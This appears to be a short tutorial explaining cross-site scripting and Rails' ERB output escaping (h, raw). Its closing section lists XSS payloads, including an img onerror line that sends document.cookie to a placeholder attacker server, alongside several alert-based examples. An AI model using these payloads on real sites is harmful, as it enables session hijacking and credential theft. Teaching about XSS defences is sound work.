XSS is cross-site scripting, with this an attacker can insert malicious script/html into the victim's browser. The end users browser has no way to know whether he script is trusted. It assumes the script came from the trusted source. The malicious script can access any cookies, session tokens, or other sensitive information with that site. These scripts can even edit the content of the HTML page. It can be used to fool the end user to gain sensitive information.

For example user visit a forum on regular basis. In thread there's a text field for the reply body. What if you put some malicious html/script there. In most web frameworks the html content is not filtered automatically. An attacker can take advantage of this and put some code there to get your secret information.

Suppose user A and B are two regular users of a forum. User c wants to compromise the accounts of users A and B. Attacker will use a technique "stored cross-site scripting" attack.

First attacker will create a new forum topic that A and B are sure to visit. In the body of this forum post attacker will put some malicious HTML and Javascript.

This malicious code will edit most of the appearance of the page and display a fake login page. When user A or B click on this link , they'll be prompted a login page for the site. User assume their login cookies has expired and they need to login again. They enter their credentials, in the background their credentials are submitted to a web some server controlled by attacker.

Its simple example of cross site scripting. You can filter html content in ROR before is presented to user.

Whenever you use the erb tags <%= code %>, it automatically filter HTML. For example, say <%= "<blink>hello</blink>" %> in a template, this string will be passed through an HTML filter automatically.

As an experiment, you can try outputting various strings using ERB. Note that these can come from anywhere, string literals or instance variables, it doesn't matter. Every string that passes through ERB will automatically be filtered.

However in older version of rails you have to pass h <%=h code %> to get this behavior. You can explicitly tell Rails if you don't want the automatic filter using <%=raw code %>.

Some examples of cross site scripting:

<img src=x onerror=this.src='http://yourserverIP/?c='+document.cookie>

XSS attacks can also be performed without using <script></script> tags. For example:

<body onload=alert('you are hacked')>

or other attributes like: onmouseover, onerror.

onmouseover

<b onmouseover=alert('wow!')>click me!</b>

onerror

<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>